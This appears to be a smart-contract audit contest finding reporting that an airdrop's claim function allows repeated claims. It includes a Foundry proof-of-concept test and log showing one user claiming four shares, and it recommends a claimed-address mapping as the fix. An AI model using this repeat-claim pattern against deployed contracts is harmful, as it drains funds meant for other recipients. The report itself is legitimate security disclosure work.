Submission Details
Severity:
Winners can withdraw multiple times
Summary
Users can withdraw multiple times
Vulnerability Details
Users should only be able to claim the aidrop once, but no check is made to prevent executing the claim function multiple times and getting all the prize !
Impact
Only one of the winner will receive the funds that were supposed to be split
Tools Used
foundry
Poc:
function testUsersCanClaimMultipleTimes() public {
uint256 startingBalance = token.balanceOf(collectorOne);
vm.deal(collectorOne, airdrop.getFee() * 4);
vm.startPrank(collectorOne);
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
vm.stopPrank();
uint256 endingBalance = token.balanceOf(collectorOne);
console2.log("Now collector 1 has :", token.balanceOf(collectorOne));
assertEq(endingBalance - startingBalance, amountToCollect * 4);
}
console log:
[PASS] testUsersCanClaimMultipleTimes() (gas: 123761)
Logs:
Now collector 1 has : 25000000
Now collector 1 has : 50000000
Now collector 1 has : 75000000
Now collector 1 has : 100000000
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.79ms (543.70µs CPU time)
Recommendations
Add a mapping that is updated when the prize is claimed by an address and add a if statement in the claim function that checks if the address has claimed before the prize
Updates
Lead Judging Commences
inallhonesty about 1 year ago
Submission Judgement Published Assigned finding tags:
multi-claim-airdrop
Rewards breakdown
nSLOC
62This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.